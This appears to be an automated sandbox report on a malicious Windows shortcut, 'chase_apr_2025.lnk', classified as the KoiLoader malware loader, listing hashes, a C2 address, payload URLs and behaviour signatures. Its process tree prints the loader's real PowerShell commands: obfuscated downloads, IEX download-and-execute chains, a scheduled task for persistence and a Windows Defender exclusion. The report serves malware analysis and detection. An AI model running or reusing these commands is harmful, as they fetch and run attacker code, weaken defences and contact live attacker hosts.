Overview

overview

10

Static

static

1

chase_apr_2025.lnk

windows10-2004-x64

10

Resubmissions

18/04/2025, 17:49

250418-wd4tystls6 8

09/04/2025, 06:42

250409-hgf1eastav 10

Analysis

  • max time kernel
    122s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/04/2025, 06:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    chase_apr_2025.lnk

  • Size

    1KB

  • MD5

    36a9f6a6fe333f902077a73d990f0a4e

  • SHA1

    906818153a8ff4bf10cfb8615ff6b9021140623c

  • SHA256

    09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43

  • SHA512

    cfc907e28c5069edc9e837b53f13377fbc015e1baba7401d1f3adb0bbdefa1dc95b830da58ef3b84e07ef8e8558d0b9b593e3d5c4c0d258cb50f0c8c73d5f5c7

Score
10/10
koiloaderdefense_evasiondiscoveryexecutionloader

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rietiholidays.it/wp-content/uploads/2021/06

Extracted

Family

koiloader

C2

http://103.245.231.56/pentateuchal.php

Attributes
  • payload_url

    https://rietiholidays.it/wp-content/uploads/2021/06

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

    loaderkoiloader
  • Koiloader family
    koiloader
  • Detects KoiLoader payload 1 IoCs
    loader
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

    defense_evasion
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4612
      • C:\Windows\system32\curl.exe
        "C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php
        3⤵
          PID:1568
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4712
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -com "schtasks /delete /tn yxliyx19s /f; wscript $env:programdata\yxliyx19s.js "
        2⤵
        • Indicator Removal: Clear Persistence
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4212
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn yxliyx19s /f
          3⤵
            PID:5480
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\ProgramData\yxliyx19s.js
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:468
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$typs=[Ref].Assembly.GetTypes();$bss = 'https://rietiholidays.it/wp-content/uploads/2021/06'; Foreach($tt in $typs) {if ($tt.Name -like '*?siUt*s') {$c=$tt}}; $env:paths = '7zUCY2VKNMVQ'; IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/argulusrQbt.php')); IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/revettedYf.ps1'))"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2276
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://rietiholidays.it/wp-content/uploads/2021/06/sd2.ps1')"
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4072
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command IEX(IWR -UseBasicParsing 'https://rietiholidays.it/wp-content/uploads/2021/06/sd2.ps1')
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5488
      • C:\Windows\SysWOW64\DllHost.exe
        C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        1⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1560
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:632
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\rcb4cb3af-08e1-460e-bfae-f9dd6e47a0b1r.js"
        1⤵
          PID:4488

        Network

        MITRE ATT&CK Enterprise v16

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\2qr3mg7cssz4nr.js
          Filesize

          202B

          MD5

          3407a07c85650e96c3e6ec56aa46ea1a

          SHA1

          cad92877b5a293aac54432bd9981d68d80aab31a

          SHA256

          d9719b4c842855ac5b7f8cbbe36b04aed226084e67d26d0c5f239d977f4a49a7

          SHA512

          76379e47eaa4f254b36595d43d79c0034b02b68015f958ef66fb6c04a83acd7ff3b039c16cdcd7de6c95350a382f18fc29723ea84b7e5151f09a4872f7946e79

          Download Submit

        • C:\ProgramData\zqd1lm17ezgl
          Filesize

          1KB

          MD5

          69e9b5dfd8fc40979f299ddd2196f500

          SHA1

          36775432b67f8130bcee1443a74eba4a72889668

          SHA256

          1d4961c0d9825bb0b771f5c7b788cf200e2db1e6a62a1481b125edca13d43650

          SHA512

          43f7e7993e20a15fcc898853d1bd2ffbf459e868a4677faf3f724a75e19acc6d4782c224d143fb0551bc2c7445508e3de018cc6a98481062f33addf4fe6e21f8

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          556084f2c6d459c116a69d6fedcc4105

          SHA1

          633e89b9a1e77942d822d14de6708430a3944dbc

          SHA256

          88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

          SHA512

          0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          bdeca768dc4217d0bfd563e11355b0c7

          SHA1

          31fcd28400e176ef0826334598313d664633f49d

          SHA256

          04a8d11d2bac9c3dbfdd62c3dbf6f00eee0767a1228330fb5ef423ad43e8c7d0

          SHA512

          b611d5814d1c48ebe6bc2ffd6fd7740243fa9dbf01c257723350ce78024a10e35cae281935291414628289b78e17fa7f3b523442b8f8fbb162cd4b17fe5c0a13

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          1a11402783a8686e08f8fa987dd07bca

          SHA1

          580df3865059f4e2d8be10644590317336d146ce

          SHA256

          9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

          SHA512

          5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3dnaiz43.dzb.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/632-86-0x0000000007080000-0x0000000007094000-memory.dmp

          Filesize

          80KB

          Download

        • memory/632-88-0x0000000007160000-0x0000000007168000-memory.dmp

          Filesize

          32KB

          Download

        • memory/632-87-0x0000000007180000-0x000000000719A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/632-85-0x0000000007070000-0x000000000707E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/632-84-0x0000000007040000-0x0000000007051000-memory.dmp

          Filesize

          68KB

          Download

        • memory/632-83-0x00000000070C0000-0x0000000007156000-memory.dmp

          Filesize

          600KB

          Download

        • memory/632-82-0x0000000006EB0000-0x0000000006EBA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/632-81-0x0000000006D20000-0x0000000006DC3000-memory.dmp

          Filesize

          652KB

          Download

        • memory/632-70-0x0000000070C20000-0x0000000070C6C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/632-80-0x0000000006070000-0x000000000608E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/632-69-0x0000000006CE0000-0x0000000006D12000-memory.dmp

          Filesize

          200KB

          Download

        • memory/2276-49-0x0000000005FA0000-0x00000000062F4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/2276-53-0x00000000069E0000-0x00000000069FA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2276-55-0x0000000007CD0000-0x0000000007CD1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2276-56-0x0000000007D60000-0x0000000007D6D000-memory.dmp

          Filesize

          52KB

          Download

        • memory/2276-52-0x0000000006680000-0x00000000066CC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2276-35-0x0000000005030000-0x0000000005066000-memory.dmp

          Filesize

          216KB

          Download

        • memory/2276-36-0x00000000056A0000-0x0000000005CC8000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/2276-37-0x0000000005610000-0x0000000005632000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2276-38-0x0000000005E40000-0x0000000005EA6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2276-51-0x00000000065E0000-0x00000000065FE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/2276-54-0x0000000007E70000-0x00000000084EA000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/2276-39-0x0000000005EB0000-0x0000000005F16000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4612-14-0x00007FFE3D690000-0x00007FFE3E151000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4612-2-0x00007FFE3D693000-0x00007FFE3D695000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4612-20-0x00007FFE3D690000-0x00007FFE3E151000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4612-13-0x00007FFE3D690000-0x00007FFE3E151000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4612-3-0x000001D8DAE70000-0x000001D8DAE92000-memory.dmp

          Filesize

          136KB

          Download

        • memory/5488-102-0x0000000007B10000-0x0000000007B32000-memory.dmp

          Filesize

          136KB

          Download

        • memory/5488-103-0x0000000008890000-0x0000000008E34000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/5488-104-0x0000000006340000-0x000000000635A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/5488-105-0x0000000008370000-0x00000000083C0000-memory.dmp

          Filesize

          320KB

          Download

        • memory/5488-106-0x0000000008460000-0x00000000084F2000-memory.dmp

          Filesize

          584KB

          Download